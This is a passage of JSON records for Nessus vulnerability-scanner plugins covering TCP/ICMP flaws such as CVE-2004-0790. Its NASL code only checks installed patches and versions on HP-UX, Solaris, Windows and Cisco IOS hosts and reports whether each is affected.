(hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-KRN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-PRG\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-KRN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NMS2-KRN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE2-KRN\", version:\"B.11.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:17:05", "description": "SunOS 5.10: kernel Patch.\nDate this patch was last updated by Sun : Feb/23/06", "cvss3": {"score": null, "vector": null}, "published": "2005-08-02T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 118822-30", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2005-3250", "CVE-2005-4701", "CVE-2008-1095"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "SOLARIS10_118822.NASL", "href": "https://www.tenable.com/plugins/nessus/19367", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(19367);\n script_version(\"1.39\");\n\n script_name(english: \"Solaris 10 (sparc) : 118822-30\");\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2005-3250\", \"CVE-2005-4701\", \"CVE-2008-1095\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 118822-30\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10: kernel Patch.\nDate this patch was last updated by Sun : Feb/23/06');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/118822-30\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n script_cwe_id(264);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/08/02\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/10/13\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 118822-30\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:16:55", "description": "SunOS 5.10_x86: kernel Patch.\nDate this patch was last updated by Sun : Oct/28/05\n\nThis plugin has been deprecated and either replaced with individual 118844 patch-revision plugins, or deemed non-security related.", "cvss3": {"score": null, "vector": null}, "published": "2005-08-02T00:00:00", "type": "nessus", "title": "Solaris 10 (x86) : 118844-20 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2005-3250", "CVE-2005-4701", "CVE-2008-1095"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_118844.NASL", "href": "https://www.tenable.com/plugins/nessus/19370", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19370);\n script_version(\"1.40\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2005-3250\", \"CVE-2005-4701\", \"CVE-2008-1095\");\n\n script_name(english:\"Solaris 10 (x86) : 118844-20 (deprecated)\");\n script_summary(english:\"Check for patch 118844-20\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"SunOS 5.10_x86: kernel Patch.\nDate this patch was last updated by Sun : Oct/28/05\n\nThis plugin has been deprecated and either replaced with individual\n118844 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/118844-20\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 118844 instead.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:17:27", "description": "The remote host runs a version of Windows that has a flaw in its TCP/IP stack.\n\nThe flaw may allow an attacker to execute arbitrary code with SYSTEM privileges on the remote host or to perform a denial of service attack against the remote host.\n\nProof of concept code is available to perform a denial of service attack against a vulnerable system.", "cvss3": {"score": null, "vector": null}, "published": "2005-04-12T00:00:00", "type": "nessus", "title": "MS05-019: Vulnerabilities in TCP/IP Could Allow Remote Code Execution (893066) (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-0048", "CVE-2004-0790", "CVE-2004-1060", "CVE-2004-0230", "CVE-2005-0688"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB893066.NASL", "href": "https://www.tenable.com/plugins/nessus/18028", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18028);\n script_version(\"1.37\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2005-0048\", \"CVE-2004-0790\", \"CVE-2004-1060\", \"CVE-2004-0230\", \"CVE-2005-0688\");\n script_bugtraq_id(13124, 13116);\n script_xref(name:\"MSFT\", value:\"MS05-019\");\n script_xref(name:\"MSKB\", value:\"893066\");\n\n script_name(english:\"MS05-019: Vulnerabilities in TCP/IP Could Allow Remote Code Execution (893066) (uncredentialed check)\");\n script_summary(english:\"Checks for hotfix KB893066\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host due to a flaw in the\nTCP/IP stack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host runs a version of Windows that has a flaw in its\nTCP/IP stack.\n\nThe flaw may allow an attacker to execute arbitrary code with SYSTEM\nprivileges on the remote host or to perform a denial of service attack\nagainst the remote host.\n\nProof of concept code is available to perform a denial of service\nattack against a vulnerable system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2005/ms05-019\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows 2000, XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/12\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows\");\n\n script_dependencies(\"tcp_seq_window.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"TCP/seq_window_flaw\", \"Host/OS\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nos = get_kb_item_or_exit(\"Host/OS\") ;\n\nconf = get_kb_item_or_exit(\"Host/OS/Confidence\");\nif (conf <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n\nif (\"Windows\" >!< os) exit(0, \"The host is not running Windows.\");\nif (\"Windows 4.0\" >< os) exit(0, \"Windows NT is not reported to be affected.\");\nif (\"Windows Server 2003 Service Pack\" >< os) exit(0, \"Windows 2003 SP1 and later are not reported to be affected.\");\n\nif (ereg(pattern:\"Windows (95|98|ME|XP|Server 2003)\", string:os))\n{\n if (get_kb_item(\"TCP/seq_window_flaw\"))\n {\n security_hole(port:get_kb_item(\"SMB/transport\"));\n exit(0);\n }\n else exit(0, \"The host is not affected.\");\n}\nelse exit(0, \"The host is not running one of the versions of Windows reportedly affected.\");\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-08-19T13:03:21", "description": "A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled \"ICMP Attacks Against TCP\" (draft-gont-tcpm-icmp-attacks-03.txt ).\nThese attacks, which only affect sessions terminating or originating on a device itself, can be of three types:\nSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.\nMultiple Cisco products are affected by the attacks described in this Internet draft.\nCisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.", "cvss3": {"score": null, "vector": null}, "published": "2010-09-01T00:00:00", "type": "nessus", "title": "Crafted ICMP Messages Can Cause Denial of Service - Cisco Systems", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CISCO-SA-20050412-ICMP.NASL", "href": "https://www.tenable.com/plugins/nessus/48985", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# Security advisory is (C) CISCO, Inc.\n# See https://www.cisco.com/en/US/products/products_security_advisory09186a0080436587.shtml\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(48985);\n script_version(\"1.16\");\n script_cve_id(\n \"CVE-2004-0790\",\n \"CVE-2004-0791\",\n \"CVE-2004-1060\",\n \"CVE-2005-0065\",\n \"CVE-2005-0066\",\n \"CVE-2005-0067\",\n \"CVE-2005-0068\"\n );\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"222750\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCed78149\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef43691\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef44699\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef45332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef46728\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef54204\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef54206\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef54947\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef57566\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef60659\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef61610\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh04183\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh20083\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh45454\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh59823\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh62307\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh63449\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh65337\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsa52807\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsa59600\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsa60692\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsa61864\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20050412-icmp\");\n\n script_name(english:\"Crafted ICMP Messages Can Cause Denial of Service - Cisco Systems\");\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n'A document that describes how the Internet Control Message Protocol\n(ICMP) could be used to perform a number of Denial of Service (DoS)\nattacks against the Transmission Control Protocol (TCP) has been made\npublicly available. This document has been published through the\nInternet Engineering Task Force (IETF) Internet Draft process, and is\nentitled \"ICMP Attacks Against TCP\"\n(draft-gont-tcpm-icmp-attacks-03.txt ).\nThese attacks, which only affect sessions terminating or originating on\na device itself, can be of three types:\nSuccessful attacks may cause connection resets or reduction of\nthroughput in existing connections, depending on the attack type.\nMultiple Cisco products are affected by the attacks described in this\nInternet draft.\nCisco has made free software available to address these\nvulnerabilities. In some cases there are workarounds available to\nmitigate the effects of the vulnerability.\n');\n script_set_attribute(attribute:\"see_also\", value: \"https://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20050412-icmp\n script_set_attribute(attribute:\"see_also\", value: \"http://www.nessus.org/u?1ba12045\");\n # https://www.cisco.com/en/US/products/products_security_advisory09186a0080436587.shtml\n script_set_attribute(attribute:\"see_also\", value: \"http://www.nessus.org/u?8b803ffb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco Security Advisory\ncisco-sa-20050412-icmp.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value: \"local\");\n script_set_attribute(attribute:\"cpe\", value: \"cpe:/o:cisco:ios\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2005/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2010/09/01\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n\n script_end_attributes();\n script_summary(english:\"Uses SNMP to determine if a flaw is present\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CISCO\");\n script_dependencie(\"cisco_ios_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS/Version\");\n exit(0);\n}\ninclude(\"cisco_func.inc\");\n\n#\n\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS/Version\");\n\n# Affected: 12.0\nif (check_release(version: version,\n patched: make_list(\"12.0(28c)\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0DA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(12)DA8 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0DB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0DC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\n# Affected: 12.0S\nif (check_release(version: version,\n patched: make_list(\"12.0(27)S5\", \"12.0(28)S3\", \"12.0(30)S1\", \"12.0(31)S\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0SC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0SL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.0(31)S or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0SP\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.0(31)S or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0ST\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.0(31)S or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0SX\")) {\n security_warning(port:0, extra: '\\nNo fixes are planned for 12.0SX releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0SZ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.0(31)S or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0T\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\n# Affected: 12.0W5\nif (\"W5\" >< version &&\n check_release(version: version,\n patched: make_list(\"12.0(25)W5(27c)\", \"12.0(28)W5(31a)\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.0WC\nif (check_release(version: version,\n patched: make_list(\"12.0(5)WC12\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(26)E1 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XG\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XI\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XK\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XM\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XN\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XQ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XR\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XS\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(26)E1 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XV\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\n# Affected: 12.1\nif (check_release(version: version,\n patched: make_list(\"12.1(27)\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1AA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1AX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(25)EY or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1AZ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(22)EA4 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1DA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(12)DA8 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1DB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1DC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\n# Affected: 12.1E\nif (check_release(version: version,\n patched: make_list(\"12.1(22)E6\", \"12.1(23)E3\", \"12.1(26)E1\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.1EA\nif (check_release(version: version,\n patched: make_list(\"12.1(22)EA4\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EB\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.1EB releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\n# Affected: 12.1EO\nif (check_release(version: version,\n patched: make_list(\"12.1(19)EO4\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EU\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(20)EU or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EV\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.1EV releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(18)EW3 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(26)E1 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EY\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(26)E1 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1T\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(26)E1 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XG\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XI\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XM\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XP\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XQ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XR\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XT\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XU\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XV\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YI\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(22)EA4 or later\\n'); exit(0);\n}\n# Affected: 12.2\nif (check_release(version: version,\n patched: make_list(\"12.2(28)\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2B\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.2BC\nif (check_release(version: version,\n patched: make_list(\"12.2(15)BC2f\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2BW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2BY\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2BZ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(7)XI5 or later\\n'); exit(0);\n}\n# Affected: 12.2CX\nif (deprecated_version(version, \"12.2CX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\n# Affected: 12.2CY\nif (deprecated_version(version, \"12.2CY\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2CZ\")) {\n security_warning(port:0, extra: '\\nNo fix is planned for 12.2CZ releases. Upgrade to a supported release\\n'); 